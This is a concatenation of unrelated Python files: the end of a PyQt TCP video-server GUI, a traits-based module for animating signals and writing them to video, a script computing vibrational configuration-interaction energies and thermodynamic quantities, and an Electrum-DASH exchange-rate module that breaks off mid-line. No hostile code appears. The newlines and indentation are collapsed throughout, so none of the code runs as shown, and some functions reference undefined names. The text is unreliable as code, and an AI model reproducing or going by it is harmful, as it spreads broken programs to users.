self.SendVideo=Thread(target=self.TCP_Server.sendvideo) self.ReadData=Thread(target=self.TCP_Server.readdata) self.power=Thread(target=self.TCP_Server.Power) self.SendVideo.start() self.ReadData.start() self.power.start() elif self.label.text()=='Server On': self.label.setText("Server Off") self.Button_Server.setText("On") self.TCP_Server.tcp_Flag = False try: stop_thread(self.ReadData) stop_thread(self.power) stop_thread(self.SendVideo) except: pass self.TCP_Server.StopTcpServer() print ("Close TCP") if __name__ == '__main__': myshow=mywindow() if myshow.user_ui==True: myshow.show(); sys.exit(myshow.app.exec_()) else: try: pass except KeyboardInterrupt: myshow.close()
animation.py
import os import time from multiprocessing import Process import numpy as np from pyqtgraph.Qt import QtCore from traits.api import Button, Enum, Bool, Int, File from traitsui.api import View, VGroup, HGroup, UItem, \ Item, FileEditor, RangeEditor from pyface.timer.api import Timer import ecoglib.vis.ani as ani from .base import VisModule, colormaps from ..helpers import Error, validate_file_path from .. import pyf_new_api __all__ = ['AnimateInterval'] class AnimateInterval(VisModule): name = 'Animate window' anim_frame = Button('Animate') anim_time_scale = Enum(50, [0.1, 0.5, 1, 5, 10, 20, 50, 100, 200, 500]) _has_ffmpeg = Bool(False) write_frames = Button('Write movie') drop_video_frames = Int(1) video_file = File( os.path.join(os.path.abspath(os.curdir), 'vid.mp4') ) cmap = Enum('gray', colormaps) clim = Enum('display', ('display', '[2-98]%', '[1-99]%', 'full')) def __init__(self, **traits): import matplotlib.animation as anim traits['_has_ffmpeg'] = 'ffmpeg' in anim.writers.list() super(AnimateInterval, self).__init__(**traits) def __step_frame(self): n = self.__n x = self.__x y = self.__y if n >= self.__n_frames: if pyf_new_api: self._atimer.stop() else: self._atimer.Stop() return t0 = time.time() scaled_dt = self.anim_time_scale * (x[1] - x[0]) try: self.parent._qtwindow.set_image_frame(x=x[n], frame_vec=y[:, n]) except IndexError: if pyf_new_api: self._atimer.stop() else: self._atimer.Stop() QtCore.QCoreApplication.instance().processEvents() # calculate the difference between the desired interval # and the time it just took to draw (per "frame") elapsed = time.time() - t0 t_pause = scaled_dt - elapsed / self.__f_skip if t_pause < 0: self.__f_skip += 1 else: # timer is in the middle of API change if pyf_new_api: self._atimer.interval = t_pause else: self._atimer.setInterval(t_pause * 1000.0) # check to see if the frame skip can be decreased (e.g. # real-time is slowed down) while elapsed / max(1, self.__f_skip - 1) < scaled_dt: self.__f_skip = max(1, self.__f_skip - 1) if self.__f_skip == 1: break self.__n += self.__f_skip def _anim_frame_fired(self): if hasattr(self, '_atimer'): if pyf_new_api and self._atimer.active: self._atimer.stop() return elif not pyf_new_api and self._atimer.IsRunning(): self._atimer.Stop() return x, self.__y = self.curve_manager.interactive_curve.current_data(full_xdata=False) self.__f_skip = 1 self.__x = x dt = self.__x[1] - self.__x[0] self.__n_frames = self.__y.shape[1] self.__n = 0 self._atimer = Timer(self.anim_time_scale * dt * 1000, self.__step_frame) def _get_clim(self, array): if self.clim == 'full': return (array.min(), array.max()) if self.clim.endswith('%'): clim = self.clim.replace('[', '').replace(']', '').replace('%', '') p_lo, p_hi = map(float, clim.split('-')) print(p_lo, p_hi) return np.percentile(array.ravel(), [p_lo, p_hi]) else: clim = self.parent._qtwindow.cb.axis.range return clim[0] * 1e6, clim[1] * 1e6 def _write_frames_fired(self): if not validate_file_path(self.video_file): ev = Error( error_msg='Invalid video file:\n{0}'.format(self.video_file) ) ev.edit_traits() return x, y = self.curve_manager.interactive_curve.current_data(full_xdata=False) y *= 1e6 dt = x[1] - x[0] # fps is sampling frequency divided by time scale dilation fps = (dt * self.anim_time_scale) ** -1.0 chan_map = self.chan_map if self.drop_video_frames > 1: x = x[::self.drop_video_frames] y = y[..., ::self.drop_video_frames] fps /= float(self.drop_video_frames) frames = chan_map.embed(y.T, axis=1) clim = self._get_clim(y) args = (frames, self.video_file) kwargs = dict(timer='s', time=x, fps=fps, title='Scroller video', quicktime=True, colorbar=True, cbar_label='uV', cmap=self.cmap, clim=clim, origin='upper', qtdpi=100) proc = Process(target=ani.write_frames, args=args, kwargs=kwargs) proc.start() def default_traits_view(self): v = View( HGroup( VGroup( Item('anim_time_scale', label='Divide real time'), Item('anim_frame'), label='Animate Frames' ), HGroup( VGroup( Item('video_file', label='MP4 File', editor=FileEditor(dialog_style='save')), UItem('write_frames') ), VGroup( Item('cmap', label='Colormap'), Item('clim', label='Color limit mode'), Item('drop_video_frames', label='Frame drop rate', editor=RangeEditor(low=1, high=100, mode='spinner')), ), visible_when='_has_ffmpeg' ) ) ) return v
vci_diffN.py
import numpy as np import math import itertools from collections import Counter import sys from numpy import linalg from numba import jit import time from multiprocessing import Process, Queue import csv from itertools import permutations #This function is obtained from pyvci plz see github resource code #this function is for get the combination of all excited states #I used max number of excited level for each mode #eg: nmode = 3, maxlvl = 8(0-7) then we have 8*8*8 combines since 0 the vacuum one counts. #if you want to get the sum max number of states like Dr.Yagi's code plz modify this fn. #XXX add lambda verification #XXX add different N (maxn) #sys.stdout = open("vci_test_output.txt","w") #function to generate the combination t0 = time.time() class VCIthermo: def __init__(self,Lambd,Temprt,maxn,calVCI):#calVCI= 1 or filename Vref= 0 maxorder = 5 nmode = 3 filepath = "../data/prop_no_3.hs" w_omega,FCQ3,FCQ4 = self.readSindoPES(filepath,nmode) linrComb = self.loopfn(nmode,maxn) print(len(linrComb)) print(linrComb) Evlst = self.EvaluationList(nmode,w_omega,maxn,maxorder)# The list of the evaluation from Hermes xvscf table. if(calVCI): VCImtrx = self.VCImatrix(w_omega,linrComb,Evlst,nmode,maxorder,FCQ3,FCQ4,Vref,Lambd) print(VCImtrx) Energylist, Coefficient = self.DiagonalVCI(VCImtrx) #np.savez("../data/VCImatxSaveN_"+str(maxn)+".npz",Energylist,Coefficient) else: filenameVCI = "../data/VCImatxSaveN_"+str(maxn)+".npz" inputfile = np.load(filenameVCI) Energylist= inputfile['arr_0'] Coefficient = inputfile['arr_1'] self.thermoresults = np.zeros((len(Temprt),3,4)) print("sum of FCI") print(np.sum(Energylist)) print("sum of FBBE") print(np.sum(w_omega)/2+3*np.sum(w_omega)/2) #XXX instruct: 7:7 temperatures 3: three methods 4: four variable(Xi,Omg,U,S) for ii in range(len(Temprt)): self.ThemoCalc(Temprt[ii],Energylist,self.thermoresults[ii,0,:]) self.FiniteBE(Temprt[ii],w_omega,maxn,self.thermoresults[ii,2,:]) # if (maxn == 6): # self.Bose_EinsteinStat(Temprt[ii],w_omega,self.thermoresults[ii,1,:]) #if(maxn == 20): #HatreeTocm = 219474.63 #w = Energylist #v = Coefficient #print("Loooooooooooooooooooooooooooooooook",maxn) #print(w[0:5]*HatreeTocm) ##print(v[:,2]) ##testl = v[:,0] ##for idxx in range(len(testl)): ## if(testl[idxx]>0.1): ## print("id xis ",idxx) ## print("value ", testl[idxx]) #print((w[1] -w[0])*219474.63) #print((w[2] -w[0])*219474.63) #print((w[3] -w[0])*219474.63) #print((w[4] -w[0])*219474.63) #print((w[5] -w[0])*219474.63) #print((w[6] -w[0])*219474.63) ##print((w[14] -w[7])*219474.63) ##print((w[15] -w[7])*219474.63) ##print((w[16] -w[7])*219474.63) ##print((w[17] -w[7])*219474.63) #print("Loooooooooooooooooooooooooooooooook") def loopfn(self,n,maxn): if n>1: rt = [] for x in range(maxn): k = self.loopfn(n-1,maxn) for i in range(len(k)): k[i].append(x) rt += k return rt else: rt = [] for x in range(maxn): rt.append([x]) return rt #It reads in the QFF force constants def readSindoPES(self,filepath,nmode): w_omega = np.zeros(nmode) FCQ3 = np.zeros((nmode,nmode,nmode)) #Coefficient in Q (normal coordinates) #XXX Coefficient includes the 1/2 1/3! 1/4! in the front!! #Dr.Yagi used dimensionless q as unit so we need to transfer from q to Q by times sqrt(w1*w2*.../hbar^(...)) FCQ4 = np.zeros((nmode,nmode,nmode,nmode)) with open(filepath) as f: flines = f.readlines() for idx in range(len(flines)): if( len(flines[idx].split())>1): if (flines[idx].split()[1] == "Hessian(i,i)"): tl = flines[idx+1].split()#shortcut for this line leng= len(tl) if (leng == 2): for i in range(nmode): tl2 = flines[idx+1+i].split() w_omega[i] = math.sqrt(float(tl2[1])) #print("Hessian",math.sqrt(float(tl2[1])/(1.88973**2*math.sqrt(1822.888486**2)))*219474.63) if (flines[idx].split()[1] == "Cubic(i,i,i)"): for i in range(nmode): tl = flines[idx+1+i].split()#shortcut for this line FCQ3[int(tl[0])-1,int(tl[0])-1,int(tl[0])-1] = float(tl[1]) #print("Cubic3",tl[1]) if (flines[idx].split()[1] == "Cubic(i,i,j)"): for i in range(nmode*2): tl = flines[idx+1+i].split()#shortcut for this line listidx = [int(tl[0])-1,int(tl[0])-1,int(tl[1])-1] perm = permutations(listidx) for i in list(perm): FCQ3[i[0],i[1],i[2]] = float(tl[2]) #print("Cubic2",tl[2]) if (flines[idx].split()[1] == "Cubic(i,j,k)"): tl = flines[idx+1].split()#shortcut for this line listidx = [int(tl[0])-1,int(tl[0])-1,int(tl[2])-1] perm = permutations(listidx) for i in list(perm): FCQ3[i[0],i[1],i[2]] = float(tl[3]) #print("Cubic1",tl[3]) if (flines[idx].split()[1] == "Quartic(i,i,i,i)"): for i in range(nmode): tl = flines[idx+1+i].split()#shortcut for this line FCQ4[int(tl[0])-1,int(tl[0])-1,int(tl[0])-1,int(tl[0])-1] = float(tl[1]) #print("Quar4",tl[1]) if (flines[idx].split()[1] == "Quartic(i,i,j,j)"): for i in range(nmode): tl = flines[idx+1+i].split()#shortcut for this line listidx = [int(tl[0])-1,int(tl[0])-1,int(tl[1])-1,int(tl[1])-1] perm = permutations(listidx) for i in list(perm): FCQ4[i[0],i[1],i[2],i[3]] = float(tl[2]) #print("Quar22",tl[2]) if (flines[idx].split()[1] == "Quartic(i,i,i,j)"): for i in range(nmode*2): tl = flines[idx+1+i].split()#shortcut for this line listidx = [int(tl[0])-1,int(tl[0])-1,int(tl[0])-1,int(tl[1])-1] perm = permutations(listidx) for i in list(perm): FCQ4[i[0],i[1],i[2],i[3]] = float(tl[2]) #print("Quar21",tl[2]) if (flines[idx].split()[1] == "Quartic(i,i,j,k)"): for i in range(nmode): tl = flines[idx+1+i].split()#shortcut for this line listidx = [int(tl[0])-1,int(tl[0])-1,int(tl[1])-1,int(tl[2])-1] perm = permutations(listidx) for i in list(perm): FCQ4[i[0],i[1],i[2],i[3]] = float(tl[3]) #print("Quar3",tl[3]) FCQ3 = np.true_divide(FCQ3,(1.88973**3*math.sqrt(1822.888486**3))) FCQ4 = np.true_divide(FCQ4,(1.88973**4*math.sqrt(1822.888486**4))) w_omega = np.true_divide(w_omega,math.sqrt(1.88973**2*1822.888486)) #FCQ4[key] /= (1.88973**4*math.sqrt(1822.888486**4)) #FCQ3 /= (1.88973**3*math.sqrt(1822.888486**3)) #for idx in range(Omgstartidx+1,FCstartidx): # w_omega[widx] = float(tl[0]) # widx += 1 #for idx in range(FCstartidx+1, len(flines)): # tl = flines[idx].split()#shortcut for this line # leng = len(tl) # if (leng == 4): # #third order force constant # #FCQ3[int(tl[1])-1,int(tl[2])-1,int(tl[3])-1] = float(tl[0])*math.sqrt(w_omega[int(tl[1])-1]*w_omega[int(tl[2])-1]*w_omega[int(tl[3])-1]) # temp1 = float(tl[0])*math.sqrt(w_omega[int(tl[1])-1]*w_omega[int(tl[2])-1]*w_omega[int(tl[3])-1]) # FCQ3[int(tl[1])-1,int(tl[2])-1,int(tl[3])-1] = temp1 # FCQ3[int(tl[1])-1,int(tl[3])-1,int(tl[2])-1] = temp1 # FCQ3[int(tl[2])-1,int(tl[1])-1,int(tl[3])-1] = temp1 # FCQ3[int(tl[2])-1,int(tl[3])-1,int(tl[1])-1] = temp1 # FCQ3[int(tl[3])-1,int(tl[1])-1,int(tl[2])-1] = temp1 # FCQ3[int(tl[3])-1,int(tl[2])-1,int(tl[1])-1] = temp1 # if (leng == 5): # #forth order force constant # #FCQ4[int(tl[1])-1,int(tl[2])-1,int(tl[3])-1,int(tl[4])-1] = float(tl[0])*math.sqrt(w_omega[int(tl[1])-1]*w_omega[int(tl[2])-1]*w_omega[int(tl[3])-1]*w_omega[int(tl[4])-1]) # temp2 = float(tl[0])*math.sqrt(w_omega[int(tl[1])-1]*w_omega[int(tl[2])-1]*w_omega[int(tl[3])-1]*w_omega[int(tl[4])-1]) # perm = permutations([1,2,3,4]) # for i in list(perm): # FCQ4[int(tl[i[0]])-1,int(tl[i[1]])-1,int(tl[i[2]])-1,int(tl[i[3]])-1] = temp2 HatreeTocm = 219474.63 #print("harmonic oscilator:") #print(w_omega[0]*HatreeTocm) #print(w_omega[1]*HatreeTocm) #print(w_omega[2]*HatreeTocm) #print("Harmonic ZPE") #print(np.sum(w_omega)/2*HatreeTocm) return w_omega,FCQ3,FCQ4 def EvaluationList(self,nmode,w_omega,maxn,maxorder): #I used the combination to determine which operator can give us result. #The 1st is to indicate which normal mode is it. #The 2nd is to indicate which operator: 0-5 : zero(no operator, assume the basis function is orthogonal, partial deriv Q^2, Q, Q^2, Q^3, Q^4. Here we used QFF so the max order of operator is 4 and total number is 5 #The 3rd is to the which level n is, n is the bigger one than n' #The 4th is the difference between n and n' Evlst = np.zeros((nmode,maxorder,maxn,maxorder)) for i in range(nmode): for n in range(maxn): Evlst[i,0,n,0] = - w_omega[i]*(n+0.5) Evlst[i,0,n,2] = w_omega[i]*math.sqrt(n*(n-1))/2 Evlst[i,1,n,1] = math.sqrt(n/2/w_omega[i]) Evlst[i,2,n,0] = (n+0.5)/w_omega[i] Evlst[i,2,n,2] = math.sqrt(n*(n-1))/2/w_omega[i] Evlst[i,3,n,1] = 3*n/2/w_omega[i]*math.sqrt(n/2/w_omega[i]) Evlst[i,3,n,3] = math.sqrt(n*(n-1)*(n-2))/(2*w_omega[i]*math.sqrt(2*w_omega[i])) Evlst[i,4,n,0] = (6*n*(n+1)+3)/4/(w_omega[i]**2) Evlst[i,4,n,2] = (n-0.5)*math.sqrt(n*(n-1))/(w_omega[i]**2) Evlst[i,4,n,4] = math.sqrt(n*(n-1)*(n-2)*(n-3))/4/(w_omega[i]**2) return Evlst def VCImatrix(self,w_omega,linrComb,Evlst,nmode,maxorder,FCQ3,FCQ4,Vref,Lambd): leng = len(linrComb) VCImtrx = np.zeros((leng,leng)) #VCI matrix is Hermitian for i in range(leng): for j in range(i,leng): lhs = linrComb[i] rhs = linrComb[j] sumofoperator = 0 #parse each operator first #operator partial deriv: for optidx in range(nmode): #parse each mode in |xxxx> multply = 1 #the multiply product of each mode for modeidx in range(nmode): n = max(lhs[modeidx],rhs[modeidx]) diff = abs(lhs[modeidx] - rhs[modeidx]) if (modeidx == optidx and diff < maxorder): #the operator works on the correspoding Q multply *= -0.5*Evlst[modeidx,0,n,diff] else: #check if they are orthogonal if not, then zero if (diff!=0): multply *= 0 break sumofoperator += multply #operator Vref #Vref is a constant so only orthogonal can give the value multply = 1 for modeidx in range(nmode): diff = abs(lhs[modeidx] - rhs[modeidx]) if (diff!=0): multply *=0 break sumofoperator += multply*Vref #operator sum FiQi #for harmonic oscilator Fi = 0 so we pass this term #Fij = w_omega ^2 for i == j for forceidx in range(nmode): multply = 1 #print(" For F_ii i is ",forceidx) for modeidx in range(nmode): diff = abs(lhs[modeidx] - rhs[modeidx]) n = max(lhs[modeidx],rhs[modeidx]) if (forceidx == modeidx and diff < maxorder): multply *= 0.5*Evlst[modeidx,2,n,diff] else: if (diff !=0): multply *= 0 break multply*=(w_omega[forceidx]**2) sumofoperator += multply #print("------------------") #print("For Fijk ") #operator sum Fijk Qi Qj Qk for ii in range(nmode): for jj in range(nmode): for kk in range(nmode): multply = 1 eachcount = Counter([ii,jj,kk]) tempstore = [] for modeidx in range(nmode): diff = abs(lhs[modeidx] - rhs[modeidx]) n = max(lhs[modeidx],rhs[modeidx]) numberofmodeinFC = eachcount[modeidx] if (numberofmodeinFC != 0 and diff < maxorder): multply*= Evlst[modeidx,numberofmodeinFC,n,diff] else: if(diff != 0): multply*=0 break multply *= FCQ3[ii,jj,kk] sumofoperator+=Lambd*multply/6 #operator sum Fijkl Qi Qj Qk Ql for ii in range(nmode): for jj in range(nmode): for kk in range(nmode): for ll in range(nmode): multply = 1 eachcount = Counter([ii,jj,kk,ll]) for modeidx in range(nmode): diff = abs(lhs[modeidx] - rhs[modeidx]) n = max(lhs[modeidx],rhs[modeidx]) numberofmodeinFC = eachcount[modeidx] if (numberofmodeinFC != 0 and diff < maxorder): multply*= Evlst[modeidx,numberofmodeinFC,n,diff] else: if(diff!=0): multply*=0 break #break the innerest loop since they will be all zero. multply*=FCQ4[ii,jj,kk,ll] sumofoperator+=Lambd*multply/24 VCImtrx[i,j] = VCImtrx[j,i] = sumofoperator return VCImtrx def DiagonalVCI(self,VCImtrx): w,v = linalg.eigh(VCImtrx) HatreeTocm = 219474.63 print(w) print(w*HatreeTocm) #for i in range(len(w)): # print("_+++++++++++++++++++++++++++++++++++++") # print(w[i]*HatreeTocm) # print("Then the Coeff") # print(v[:,i]) #print(w*HatreeTocm) #print(np.sum(w)) #print((w[1] -w[0])*219474.63) #print((w[2] -w[0])*219474.63) #print((w[3] -w[0])*219474.63) #print((w[4] -w[0])*219474.63) #print((w[5] -w[0])*219474.63) return w,v def ThemoCalc(self,Temprt,Energylist,ret): #kb = 1 at a.u. #Calculate Grand partition function, grand potential and internal energy based on grand canonical ensemble. #Grand partition function: GPF b_beta = 1/(Temprt) print(b_beta) GPF_Xi = 0 print(np.sum(Energylist)) for eachE in Energylist: GPF_Xi += math.exp(-b_beta*eachE) print("FCI Xi") print(GPF_Xi) #grand potential GP_Omg = -math.log(GPF_Xi)/b_beta #internal energy U IE_U = 0 for eachE in Energylist: IE_U += eachE*math.exp(-b_beta * eachE) IE_U/=GPF_Xi #entropy S entropy_S = 0 #just for math domain error for eachE in Energylist: entropy_S += eachE*math.exp(-b_beta*eachE) entropy_S /= (Temprt*GPF_Xi) entropy_S += math.log(GPF_Xi) ret[0] = GPF_Xi ret[1] = GP_Omg ret[2] = IE_U ret[3] = entropy_S print("Xi, Omg, U ,S is") #print(GPF_Xi) #print(IE_U) #print(entropy_S) print("verify") print(GP_Omg) print(IE_U-Temprt*entropy_S) #Bose-Einstein statistics def Bose_EinsteinStat(self,Temprt,w_omega,ret): b_beta= 1/Temprt #f_i f_i = np.zeros(len(w_omega)) for i in range(len(w_omega)): f_i[i] = 1/(1-math.exp(-b_beta*w_omega[i])) print(f_i) #partition function GPF_Xi = 1 for ii in range(len(w_omega)): #GPF_Xi *= math.exp(-b_beta*eachw/2)/(1-math.exp(-b_beta*eachw)) GPF_Xi *= math.exp(-b_beta*w_omega[ii]/2)*f_i[ii] #grand potential GP_Omg = 0 for eachw in w_omega: GP_Omg += 0.5*eachw + math.log(1-math.exp(-b_beta*eachw))/b_beta #internal energy IE_U = 0 for eachw in w_omega: IE_U += 0.5*eachw + eachw*math.exp(-b_beta*eachw)/(1-math.exp(-b_beta*eachw)) #entropy entropy_S = 0 for eachw in w_omega: entropy_S += - math.log(1-math.exp(-b_beta*eachw)) + eachw*math.exp(-b_beta*eachw)/(Temprt*(1-math.exp(-b_beta*eachw))) ret[0] = GPF_Xi ret[1] = GP_Omg ret[2] = IE_U ret[3] = entropy_S #print("analytical Bose-Einstein stat result:") #print("Xi, Omg, U ,S is") #print(GPF_Xi) #print(IE_U) #print(entropy_S) #print("verify") #print(GP_Omg) #print(IE_U-Temprt*entropy_S) #FCI bose-einstein with finite N def FiniteBE(self,Temprt,w_omega,maxn,ret): N = maxn -1 b_beta = 1/Temprt f_i = np.zeros(len(w_omega)) tildef_i = np.zeros(len(w_omega)) for i in range(len(w_omega)): f_i[i] = 1/(1 - math.exp(- b_beta * w_omega[i])) tildef_i[i] = 1/(1 - math.exp( - b_beta * (N+1) * w_omega[i])) #partition function GPF_Xi = 1 for eachw in w_omega: GPF_Xi *= math.exp(-b_beta*eachw/2)*(1-math.exp(-b_beta*(N+1)*eachw))/(1-math.exp(-b_beta*eachw)) print("Finite BE") print(GPF_Xi) #Grand Potential GP_Omg = 0 for ii in range(len(w_omega)): GP_Omg += 0.5 * w_omega[ii] - math.log(f_i[ii]/tildef_i[ii])/b_beta #Internal Energy IE_U = 0 for ii in range(len(w_omega)): IE_U += 0.5 * w_omega[ii] + w_omega[ii]*(f_i[ii] - 1) - (N + 1) * w_omega[ii] * (tildef_i[ii] - 1) #entropy S entropy_S = 0 for ii in range(len(w_omega)): entropy_S += (math.log(f_i[ii]/tildef_i[ii])/b_beta + w_omega[ii]*(f_i[ii]-1) - (N+1)*w_omega[ii]*(tildef_i[ii]-1))/Temprt ret[0] = GPF_Xi ret[1] = GP_Omg ret[2] = IE_U ret[3] = entropy_S #print("finite analytical Bose-Einstein stat result:") #print("Xi, Omg, U ,S is") #print(GPF_Xi) #print(IE_U) #print(entropy_S) #print("verify") #print(IE_U-Temprt*entropy_S) #print(GP_Omg) def multitask(Temprt,Energylist,thermoresults): for ii in range(len(Temprt)): ThemoCalc(Temprt[ii],Energylist,thermoresults[ii,0,:]) Bose_EinsteinStat(Temprt[ii],w_omega,thermoresults[ii,1,:]) FiniteBE(Temprt[ii],w_omega,maxn,thermoresults[ii,2,:]) #np.save("../data/thermoresult_Lambda0",thermoresults) def Parallel_VCI(maxn,Lambd,Temprt,calVCI): vcirun = VCIthermo(Lambd,Temprt,maxn,calVCI) np.save("../data/Temprtgrid_n_"+str(maxn)+".npy",vcirun.thermoresults) #def Parallel_VCI(Temprt,maxn,Lambd,idx): # filename = "../data/figuremakingup_"+str(idx)+".csv" # vcirun = VCIthermo(Lambd,Temprt,maxn,calVCI) # reslt = vcirun.thermoresults # if (len(reslt[:,0,0])!= 1): # print("error") # with open(filename,'w') as csvfile: # csvwriter = csv.writer(csvfile) # for i in range(3): # #for ii in range(len(Temprt)): # csvwriter.writerow([reslt[0,i,0],reslt[0,i,1],reslt[0,i,2],reslt[0,i,3]]) #number of normal mode like H2O is 3 here I mannuly set up but later can read in from input file #nmode = 3 #maxium number of excited level for each mode. maxnlist = [4,6]#8,10,12,14,16,18,20] #maxium order of force field like QFF is 5 since we have kinetic operator at front #maxorder = 5 #by default Vref = 0 #Vref = 0 #Temperature unit is K then transfer to a.u. by 3.1577464*10^5 ( Eh/kb) Ehbykb = 3.1577464*100000 Temprt = np.array([100,1000,10000,100000,1000000,10000000,100000000]) #Tlist = np.arange(2,8.1,0.1) #Temprt = np.zeros(np.shape(Tlist)) #for i in range(np.shape(Tlist)[0]): # Temprt[i] = 10**(Tlist[i]) Temprt = Temprt/Ehbykb calVCI= 1 Lambd = 0 maxn = 2 vcirun = VCIthermo(Lambd,Temprt,maxn,calVCI) #linrComb = loopfn(nmode,maxn) #filepath = "../data/prop_no_1.mop" #Lambdlist = [0.3,0.2,0.1,0.01,0.001,0.0001] #w_omega,FCQ3,FCQ4 = readSindoPES(filepath,nmode) #Evlst = EvaluationList(nmode,w_omega,maxn,maxorder)# The list of the evaluation from Hermes xvscf table. #VCImtrx = VCImatrix(linrComb,Evlst,nmode,maxorder,FCQ3,FCQ4,Vref,Lambd) #Energylist, Coefficient = DiagonalVCI(VCImtrx) #XXX instruct: 7:7 temperatures 3: three methods 4: four variable(Xi,Omg,U,S) # diffN for 7 temperature #procs = [] #for ii in range(len(maxnlist)): # proc = Process(target = Parallel_VCI, args= (Temprt,maxnlist[ii],Lambd)) # procs.append(proc) # proc.start() #for procc in procs: # procc.join() #temprtlist = np.array([500,5000,50000,100000,100000]) #temprtlist = temprtlist/Ehbykb #procs = [] #for ii in range(len(maxnlist)): # proc = Process(target = Parallel_VCI, args= ([maxnlist[ii],Lambd,Temprt,calVCI])) # procs.append(proc) # proc.start() #for procc in procs: # procc.join() #multitask(Temprt,Energylist,thermoresults) t1 = time.time() print("time is /min",(t1-t0)/60) #sys.stdout.close()
exchange_rate.py
from datetime import datetime import inspect import requests import sys from threading import Thread import time import traceback import csv from decimal import Decimal from bitcoin import COIN from i18n import _ from util import PrintError, ThreadJob from util import format_satoshis # See https://en.wikipedia.org/wiki/ISO_4217 CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0, 'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0, 'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3, 'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0, 'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0, 'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0, # Not ISO 4217. 'BTC': 8} DEFAULT_EXCHANGE = 'Bittrex' DEFAULT_CCY = 'BTC' class ExchangeBase(PrintError): def __init__(self, on_quotes, on_history): self.history = {} self.quotes = {} self.on_quotes = on_quotes self.on_history = on_history def get_json(self, site, get_string): # APIs must have https url = ''.join(['https://', site, get_string]) response = requests.request('GET', url, headers={ 'User-Agent': 'Electrum-DASH' }) return response.json() def get_csv(self, site, get_string): url = ''.join(['https://', site, get_string]) response = requests.request('GET', url, headers={ 'User-Agent': 'Electrum-DASH' }) reader = csv.DictReader(response.content.split('\n')) return list(reader) def name(self): return self.__class__.__name__ def update_safe(self, ccy): try: self.print_error("getting fx quotes for", ccy) self.quotes = self.get_rates(ccy) self.print_error("received fx quotes") except BaseException as e: self.print_error("failed fx quotes:", e) self.on_quotes() def update(self, ccy): t = Thread(target=self.update_safe, args=(ccy,)) t.setDaemon(True) t.start() def get_historical_rates_safe(self, ccy): try: self.print_error("requesting fx history for", ccy) self.history[ccy] = self.historical_rates(ccy) self.print_error("received fx history for", ccy) self.on_history() except BaseException as e: self.print_error("failed fx history:", e) def get_historical_rates(self, ccy): result = self.history.get(ccy) if not result and ccy in self.history_ccys(): t = Thread(target=self.get_historical_rates_safe, args=(ccy,)) t.setDaemon(True) t.start() return result def history_ccys(self): return [] def historical_rate(self, ccy, d_t): return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d')) def get_currencies(self): rates = self.get_rates('') return sorted([str(a) for (a, b) in rates.iteritems() if b is not None and len(a)==3]) class Bittrex(ExchangeBase): def get_rates(self, ccy): json = self.get_json('bittrex.com', '/api/v1.1/public/getticker?market=BTC-DASH') quote_currencies = {} if not json.get('success', False): return quote_currencies last = Decimal(json['result']['Last']) quote_currencies['BTC'] = last return quote_currencies class Poloniex(ExchangeBase): def get_rates(self, ccy): json = self.get_json('poloniex.com', '/public?command=returnTicker') quote_currencies = {} dash_ticker = json.get('BTC_DASH') quote_currencies['BTC'] = Decimal(dash_ticker['last']) return quote_currencies class CoinMarketCap(ExchangeBase): def get_rates(self, ccy): json = self.get_json('api.coinmarketcap.com', '/v1/ticker/dash/') quote_currencies = {} if not isinstance(json, list): return quote_currencies json = json[0] for ccy, key in [ ('USD', 'price_usd'), ('BTC', 'price_btc'), ]: quote_currencies[ccy] = Decimal(json[key]) return quote_currencies def dictinvert(d): inv = {} for k, vlist in d.iteritems(): for v in vlist: keys = inv.setdefault(v, []) keys.append(k) return inv def get_exchanges_and_currencies(): import os, json path = os.path.join(os.path.dirname(__file__), 'currencies.json') try: return json.loads(open(path, 'r').read()) except: pass d = {} is_exchange = lambda obj: (inspect.isclass(obj) and issubclass(obj, ExchangeBase) and obj != ExchangeBase) exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange)) for name, klass in exchanges.items(): exchange = klass(None, None) try: d[name] = exchange.get_currencies() except: continue with open(path, 'w') as f: f.write(json.dumps(d, indent=4, sort_keys=True)) return d CURRENCIES = get_exchanges_and_currencies() def get_exchanges_by_ccy(history=True): if not history: return dictinvert(CURRENCIES) d = {} exchanges = CURRENCIES.keys() for name in exchanges: klass = globals()[name] exchange = klass(None, None) d[name] = exchange.history_ccys() return dictinvert(d) class FxThread(ThreadJob): def __init__(self, config, network): self.config = config self.network = network self.ccy = self.get_currency() self.history_used_spot = False self.ccy_combo = None self.hist_checkbox = None self.set_exchange(self.config_exchange()) def get_currencies(self, h): d = get_exchanges_by_ccy(h) return sorted(d.keys()) def get_exchanges_by_ccy(self, ccy, h): d = get_exchanges_by_ccy(h) return d.get(ccy, []) def ccy_amount_str(self, amount, commas): prec = CCY_PRECISIONS.get(self.ccy, 2) fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec)) return fmt_str.format(round(amount, prec)) def run(self): # This runs from the plugins thread which catches exceptions if self.is_enabled(): if self.timeout ==0 and self.show_history(): self.exchange.get_historical_rates(self.ccy) if self.timeout <= time.time(): self.timeout = time.time() + 150 self.exchange.update(self.ccy) def is_enabled(self): return bool(self.config.get('use_exchange_rate')) def set_enabled(self, b): return self.config.set_key('use_exchange_rate', bool(b)) def get_history_config(self): return bool(self.config.get('history_rates')) def set_history_config(self, b): self.config.set_key('history_rates', bool(b)) def get_currency(self): '''Use when dynamic fetching is needed''' return self.config.get("currency", DEFAULT_CCY) def config_exchange(self): return self.config.get('use_exchange', DEFAULT_EXCHANGE) def show_history(self): return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys() def set_currency(self, ccy): self.ccy = ccy self.config.set_key('currency', ccy, True) self.timeout = 0 # Because self.ccy changes self.on_quotes() def set_exchange(self, name): class_ = globals().get(name, Bittrex) self.print_error("using exchange", name) if self.config_exchange() != name: self.config.set_key('use_exchange', name, True) self.exchange = class_(self.on_quotes, self.on_history) # A new exchange means new fx quotes, initially empty. Force # a quote refresh self.timeout = 0 def on_quotes(self): self.network.trigger_callback('on_quotes') def on_history(self): self.network.trigger_callback('on_history') def exchange_rate(self): '''Returns None, or the exchange rate as a Decimal''' rate = self.exchange.quotes.get(self.ccy) if rate: return Decimal(rate) def format_amount_and_units(self, btc_balance): rate = self.exchange_rate() return '' if rate is None else "%s 